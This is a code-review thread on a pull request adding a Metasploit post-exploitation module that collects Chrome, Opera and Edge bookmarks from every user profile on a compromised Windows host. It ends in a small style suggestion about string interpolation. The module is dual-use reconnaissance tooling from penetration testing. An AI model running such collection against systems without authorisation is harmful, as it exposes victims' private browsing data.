modules/post/windows/gather/get_bookmarks.rb

```diff
@@ -0,0 +1,68 @@
+class MetasploitModule < Msf::Post
+    include Msf::Post::File
+    include Msf::Post::Windows::UserProfiles
+    def initialize(info = {})
+      super(
+        update_info(
+          info,
+          'Name' => 'Bookmarked Sites Retriever',
+          'Description' => %q{
+            This module discovers information about a target by retrieving their bookmarked websites on Google Chrome, Opera and Microsoft Edge.
+          },
+          'License' => MSF_LICENSE,
+          'Author' => [ 'jerrelgordon'],
+          'Platform' => [ 'win' ],
+          'SessionTypes' => [ 'meterpreter', 'shell' ]
+        )
+   )
+    end
+
+    def run
+      get_bookmarks("GoogleChrome") # gets bookmarks for google chrome
+      get_bookmarks("Opera") # gets bookmarks for opera
+      get_bookmarks("Edge") # gets bookmarks for edge
+    end
+
+
+    def get_bookmarks(browser)
+      print_status("Bookmarks on: " + browser) 
+      fileexists = false # initializes file as not found
+      grab_user_profiles().each do |user| #parses information for all users on target machine into a list.
+        # If the browser is Google Chrome or Edge is searches the "AppData\Local directory, if it is Opera, it searches the AppData\Roaming directory"
+        if (browser == "GoogleChrome")
+            next unless user['LocalAppData']
+            bookmark_path = user['LocalAppData'] + "\\Google\\Chrome\\User Data\\Default\\Bookmarks" #sets path for Google Chrome Bookmarks
```

Comment:
String interpolation would be preferred for the bookmark paths:
```suggestion
            bookmark_path = "#{user['LocalAppData']}\\Google\\Chrome\\User Data\\Default\\Bookmarks" #sets path for Google Chrome Bookmarks
```

Reply:
Hey, I've added the string interpolation as you recommended. Could you take a look and let me know if there's anything else that may be needed.

Reply:
Looks like all of that is covered. Thanks!